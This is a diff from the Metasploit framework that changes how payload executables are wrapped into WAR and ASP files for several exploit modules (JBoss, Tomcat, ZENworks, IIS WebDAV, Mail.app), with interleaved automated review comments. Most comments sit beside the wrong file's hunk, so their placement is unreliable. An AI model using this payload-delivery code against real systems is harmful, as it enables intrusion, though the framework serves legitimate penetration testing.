diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb
index 074ddb0ade..aed76c3082 100644
--- a/lib/msf/base/simple/payload.rb
+++ b/lib/msf/base/simple/payload.rb
@@ -97,7 +97,8 @@ module Payload
 plat = Msf::Module::PlatformList.transform(opts['Platform'])
 tmp_plat = plat.platforms
- buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
+ buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
 else
 # Serialize the generated payload to some sort of format
 buf = Buffer.transform(e.encoded, fmt)
diff --git a/lib/msf/core/rpc/module.rb b/lib/msf/core/rpc/module.rb
index f0b01ad37d..d04651d4b9 100644
--- a/lib/msf/core/rpc/module.rb
+++ b/lib/msf/core/rpc/module.rb
@@ -216,7 +216,8 @@ class Module < Base
 output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
 when 'war'
 tmp_plat = plat.platforms
- output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
+ output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
 else
 fmt ||= "ruby"
 output = Msf::Simple::Buffer.transform(raw, fmt)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index cd58e96cc9..779bd2854d 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
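Review bot: The new `exe` returned by to_executable is handed to to_jsp_war without any check, so if to_executable yields nil for an arch/platform pair it cannot build (the `if(exe)` guard visible in the msfpayload hunk of this same diff suggests it can), the failure surfaces deep inside to_jsp_war or as a WAR whose JSP carries no usable executable. Fail fast before building the archive: `raise ArgumentError, "Failed to build an executable for arch #{arch.inspect} / platform #{tmp_plat.inspect}" unless exe`. Note also that `:persist => false` is no longer forwarded to to_executable (the removed to_jsp_war body passed the whole opts hash through), only to to_jsp_war; if any executable generator honoured that key this is a behaviour change worth a comment. The enclosing method starts and ends outside the hunk.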
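Review bot: The `war` branch builds the executable with only `:template => altexe`, while the `asp` branch two lines above passes `:insert => inject` and the msfencode hunk in this diff now passes it for its war output too, so an inject request through the RPC war path is dropped silently, as it already was before this change. Make the paths agree: `exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })`. A nil guard on `exe` before the to_jsp_war call would also give RPC clients a meaningful error instead of a failure inside the WAR builder. The enclosing case statement starts and ends outside the hunk.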
@@ -813,9 +813,7 @@ require 'metasm'
 # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
 # The jsp page converts the hexdump back to a normal .exe file and places it in
 # the temp directory. The payload .exe file is then executed.
- def self.to_jsp_war(framework, arch, plat, code='', opts={})
-
- exe = to_executable(framework, arch, plat, code, opts)
+ def self.to_jsp_war(exe, opts={})
 # begin .jsp
 var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb
index 5d2a600834..05f07ab9ce 100644
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
 :jsp_name => jsp_name
 })
 else
- @war_data = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- p.encoded,
+ exe = generate_payload_exe({ :code => p.encoded })
+ @war_data = Msf::Util::EXE.to_jsp_war(exe,
 {
 :app_name => app_base,
 :jsp_name => jsp_name
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index a38564d2cc..885b2ca955 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
 def initialize(info = {})
 super(update_info(info,
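Review bot: The new signature takes an already-built executable, but the comment above still reads as if the method generated the payload itself, and nothing rejects a nil or empty `exe`, which would produce a WAR whose JSP writes and executes an empty file on the target. Add a guard as the first statement of the method, `raise ArgumentError, "exe must be a non-empty executable image" if exe.nil? || exe.empty?`, and extend the comment with a line such as `# exe: raw executable bytes (see to_executable); opts may carry :app_name, :jsp_name and :persist`. Those option keys are taken from the call sites in this diff, so confirm them against the body, which continues outside the hunk. Any out-of-tree caller still using the old five-argument form now fails with an arity ArgumentError, which the comment could also mention.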
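Review bot: `generate_payload_exe` is provided by Msf::Exploit::EXE, yet unlike the tomcat, zenworks and mailapp changes in this diff no `include Msf::Exploit::EXE` is added to jboss_maindeployer, so unless the module already mixes it in outside the hunk this branch raises NoMethodError at exploit time; please confirm the include exists. The result should also be checked before it reaches to_jsp_war, e.g. `raise RuntimeError, 'Failed to generate payload executable for the selected target' unless exe`, so an unsupported arch/platform is reported instead of deploying a broken WAR. The enclosing method starts and ends outside the hunk.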
@@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Using manually select target \"#{mytarget.name}\"")
 end
- # set arch/platform from the target
- arch = mytarget['Arch']
- plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
-
 # Generate the WAR containing the EXE containing the payload
 jsp_name = rand_text_alphanumeric(4+rand(32-4))
- war = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- payload.encoded,
- :jsp_name => jsp_name)
+ exe = generate_payload_exe
+ war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
 app_base = rand_text_alphanumeric(4+rand(32-4))
 query_str = "?path=/" + app_base
diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb
index 8262eaf6d4..6b547e670e 100644
--- a/modules/exploits/osx/email/mailapp_image_exec.rb
+++ b/modules/exploits/osx/email/mailapp_image_exec.rb
@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # This module sends email messages via smtp
 #
 include Msf::Exploit::Remote::SMTPDeliver
+ include Msf::Exploit::EXE
 def initialize(info = {})
 super(update_info(info,
@@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if (target.arch.include?(ARCH_CMD))
 cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
 else
- bin = ''
-
- if(target.arch.index(ARCH_PPC))
- bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
- end
-
- if(target.arch.index(ARCH_X86))
- bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
- end
-
+ bin = generate_payload_exe
 cmd = Rex::Text.encode_base64(bin, "\r\n")
 end
diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb
index 396ffdd109..e5d792c6c5 100644
--- a/modules/exploits/windows/http/zenworks_uploadservlet.rb
+++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb
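Review bot: The removed lines derived arch and platform from `mytarget`, the target this method resolved (the context line prints `mytarget.name`), whereas the replacement `exe = generate_payload_exe` takes no argument and builds the executable from whatever the mixin treats as the current target; when the user leaves the target on an automatic choice those two can differ and the WAR would carry an executable for the wrong platform. Pass the resolved target explicitly if the mixin accepts one, e.g. `exe = generate_payload_exe(:target => mytarget)`, or confirm in the mixin that it resolves to `mytarget` here. A nil check on `exe` before to_jsp_war would also turn a silently bad WAR into a clear failure. The enclosing method starts and ends outside the hunk.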
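Review bot: `bin = generate_payload_exe` feeds straight into `Rex::Text.encode_base64(bin, "\r\n")`; the removed code at least left `bin` as an empty string for an arch it did not handle, whereas a nil return from the mixin now raises from inside Rex, and an empty result would still be mailed to the recipient as an attachment. Check before encoding: `raise RuntimeError, 'Failed to build a Mach-O payload for the selected target' if bin.nil? || bin.empty?`. The removed branches preferred the x86 Mach-O when a target listed both PPC and x86 (the second assignment won); confirm the mixin makes the same choice for such targets. The enclosing method starts and ends outside the hunk.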
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
 def initialize(info = {})
 super(update_info(info,
@@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
- arch = target['Arch']
- plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
-
 # Generate the WAR containing the EXE containing the payload
 app_base = rand_text_alphanumeric(4+rand(32-4))
 jsp_name = rand_text_alphanumeric(8+rand(8))
- war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
+
+ exe = generate_payload_exe
+ war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
 res = send_request_cgi( {
diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
index 9f256791d9..b759a87b6a 100644
--- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
+++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb
@@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
 # Generate the ASP containing the EXE containing the payload
- asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
+ exe = generate_payload_exe
+ asp = Msf::Util::EXE.to_exe_asp(exe)
 path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
 path_tmp = path.gsub(/\....$/, ".txt")
diff --git a/msfencode b/msfencode
index b7b89d04b5..550f92eac6 100755
--- a/msfencode
+++ b/msfencode
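Review bot: `exe = generate_payload_exe` is passed to to_jsp_war with no check, so a nil result for an arch/platform the mixin cannot build (plausible, given the `if(exe)` guard visible around the same kind of result in the msfpayload hunk of this diff) is only discovered inside the WAR builder or, worse, uploaded to the servlet as a broken archive. Add `raise RuntimeError, 'Failed to generate payload executable for the selected target' unless exe` before the to_jsp_war call. The method also no longer reads `target['Arch']`/`target['Platform']` itself; that is fine as long as the mixin derives them from the same `target`, which is worth confirming. The enclosing method continues past the hunk.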
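Review bot: The new `exe = generate_payload_exe` relies on the Msf::Exploit::EXE mixin, but unlike the tomcat, zenworks and mailapp hunks in this diff no `include Msf::Exploit::EXE` is added to this module; unless it is already included outside the hunk, the first `exploit` run fails with NoMethodError. The new `Msf::Util::EXE.to_exe_asp(exe)` is likewise not defined anywhere in this diff, so confirm it already exists in lib/msf/util/exe.rb with that name and arity. A guard such as `raise RuntimeError, 'Failed to generate payload executable' unless exe` before to_exe_asp would keep a nil executable from being wrapped into an ASP and uploaded. The enclosing method continues past the hunk.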
@@ -273,8 +273,11 @@ case cmd
 asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
 write_encoded(asp)
 when 'war'
- tmp_plat = plat.platforms
- war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ arch ||= [ ARCH_X86 ]
+ tmp_plat = plat.platforms if plat
+ tmp_plat ||= Msf::Module::PlatformList.transform('win')
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
+ war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
 write_encoded(war)
 else
 fmt ||= "ruby"
diff --git a/msfpayload b/msfpayload
index 1509fcf471..0146facafc 100755
--- a/msfpayload
+++ b/msfpayload
@@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
 arch = payload.arch
 plat = payload.platform.platforms
- exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_jsp_war(exe)
 if(exe)
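Review bot: The fallback `tmp_plat ||= Msf::Module::PlatformList.transform('win')` assigns a PlatformList object, whereas the line above it and every other call site in this diff (payload.rb: `tmp_plat = plat.platforms`) hand to_executable the `.platforms` array, so the two branches pass different types and to_executable may not accept the list form. Mirror the other callers: `tmp_plat ||= Msf::Module::PlatformList.transform('win').platforms`. The defaults `arch ||= [ ARCH_X86 ]` and the Windows fallback also silently decide the executable format when the user specified neither an arch nor a platform; a one-line warning to stderr when either default kicks in would avoid handing out a Windows x86 WAR that was never asked for. The enclosing case statement starts and ends outside the hunk.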